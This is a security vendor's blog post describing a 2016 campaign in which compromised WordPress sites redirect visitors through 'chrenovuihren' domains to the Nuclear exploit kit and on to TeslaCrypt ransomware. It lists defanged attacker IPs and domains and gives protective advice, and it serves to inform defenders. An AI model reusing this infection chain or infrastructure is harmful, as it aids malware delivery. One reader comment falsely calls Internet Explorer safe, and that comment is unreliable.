SECURITY EVANGELIST

Our team warns that a disproportionate amount of websites that employ the WordPress platform have been compromised by cyber criminals.

Hundreds of WordPress websites spreading malware

 


The attackers fed obfuscated Javascript code to these websites. The users who end up on the hacked websites are redirected on a domain called “chrenovuihren” via multiple servers.

You can see a typical infection chain below:

[Compromised, legitimate Website running WordPress] -> http:// js[.]chrenovuihren [.] Org / mobile /? Id = [campaign ID] & keyword = [coded ID]

The many malicious scripts injected into WordPress websites move all the traffic to the domain called “chrenovuihren”, where all the users see the following title:

[title] Advertised [/ title]

This online advertisement forces the traffic to the servers that host the exploit kit, which all try to exploit vulnerabilities on the victim’s system.

The attackers manage to achieve this by using the Nuclear exploit kit, which is available commercially via the exploit kits-as-a-service model.

Nuclear can exploit vulnerabilities in:

  • Adobe Flash Player
  • Adobe Reader / Acrobat
  • Internet Explorer
  • Silverlight.

Hundreds of servers hosting WordPress-based websites have already been compromised.

Cyber criminal infrastructure details

 

We can also confirm that the following IP addresses are active Nuclear gateways (sanitized by Heimdal Security):

159,203.24 [.] 40
164,132.80 [.] 71
162,243.77 [.] 214

Cyber criminals know that moving fast is key for maintaining their anonymity.

So please note that the campaign makes use of several domains to deliver the malicious code, which is why active servers can quickly change depending on which IP as DNS lookup they use. A small selection of the malicious domains involved in this campaign is reproduced below (sanitized by Heimdal Security):

[% Subdomain%]. Chrenovuihren [.] Com
[% Subdomain%]. Chrenovuihren [.] Biz
[% Subdomain%]. Chrenovuihren [.] Net
[% Subdomain%]. Chrenovuihren [.] Org

If the victim’s computer is not properly updated, then the system will be fed Teslacrypt ransomware. What’s more, this Teslacrypt variant is identical to the other ransomware strains, so Cryptowall or other ransomware types could also infect the victim’s PC.

payload-teslacrypt

We have already blocked more than 85 domains that are being actively used in this campaign, and the list will most likely increase.

As you can see, antivirus detection of exploit code is low: only 2/66 on VirusTotal.

Meanwhile, the payload also achieves only limited detection.

malware wordpress campaign February 4 2016

Click here for the full detection rate on VirusTotal at the time the campaign was announced.

 

Conclusion

 

These details make this particular malware campaign a massive one, and the trends is likely to continue. Only 3 days ago, Sucuri Security also announced a huge campaign targeting WordPress websites in which cyber criminals “injected encrypted code at the end of all legitimate .js files”.

The same group of attackers behind both campaigns, but that information is not confirmed.

With fileless malware infections and commercially-available exploit kit, the cyber crime scene is getting more complicated by the day. This is why we urge website owners that use WordPress to secure their servers and Internet users to follow key recommendations to get protected against ransomware:

  • Keep software and your operating system updated at all times
  • Backup your data, do it often and in multiple locations
  • Use a security tool that can filter your web traffic and protect you against ransomware, which traditional antivirus cannot detect or block.



What is Ransomware
2017.05.15 SLOW READ

What is Ransomware and 15 Easy Steps To Keep Your System Protected [Updated]

The Anti-Ransomware Protection Plan
2016.05.24 SLOW READ

The Anti-Ransomware Protection Plan You Need to Follow Today

Cyber Security Tips for Bloggers
2015.07.07 INTERMEDIATE READ

Insider Advice: 12 Cyber Security Tips for Bloggers

Comments

Internet Explorer is safe there is nothing wrong with is

I got such a chrome warning on my site. How can I detect where the code was placed on my site so that I can remove it? Thanks!

Someone should take a look at your server and scan it with a dedicated security solution to see if it’s infected. Sucuri offer very good WordPress security solutions.

I got such a chrome warning on my site. How can I detect where the code was placed on my site so that I can remove it? Thanks!

Leave a Reply

Your email address will not be published. Required fields are marked *

GO TO TOP
166 queries in 5.504 seconds